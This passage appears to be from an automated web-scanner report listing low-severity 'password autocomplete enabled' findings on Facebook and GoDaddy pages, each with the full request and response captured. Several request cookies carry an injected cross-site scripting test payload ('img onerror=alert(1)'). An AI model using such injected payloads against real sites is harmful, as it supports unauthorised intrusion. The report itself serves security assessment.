Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.27
X-Cnection: close
Date: Thu, 05 May 2011 12:37:05 GMT
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.82. https://www.facebook.com/help/contact.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /help/contact.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.83. https://www.facebook.com/login.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

12.84. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.85. https://www.facebook.com/pages/create.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/create.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.86. https://www.facebook.com/r.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/r.php
The form contains the following password field with autocomplete enabled:
  • reg_passwd__

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.226.129
Connection: close
Date: Thu, 05 May 2011 10:56:58 GMT
Content-Length: 29546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

12.87. https://www.facebook.com/r.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.226.129
Connection: close
Date: Thu, 05 May 2011 10:56:58 GMT
Content-Length: 29546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.88. https://www.facebook.com/r.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /r.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/r.php?locale=en_US
The form contains the following password field with autocomplete enabled:
  • reg_passwd__

Request

GET /r.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.181.109
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 29532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

12.89. https://www.facebook.com/recover.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /recover.php

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.90. https://www.godaddy.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB174
The form contains the following password field with autocomplete enabled:
  • password

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB174" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...

12.91. https://www.godaddy.com/domains/search.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The page contains a form with the following action URL:
  • https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB174
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWNET-M1PWCORPWEB174" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...

12.92. https://www.godaddy.com/gdshop/hosting/landing.asp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The page contains a form with the following action URL:
  • https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWB174
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div id="pct_login">

<form style="margin: 0;" name="pchFL" id="pchFL" method="post" action="https://idp.godaddy.com/login.aspx?ci=9106&spkey=GDSWB174" onsubmit="return pcj_login_action(this);">
<div class="login sprt2">
...[SNIP]...
</div>
<input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pwd inp_iphone" />
</div>
...[SNIP]...

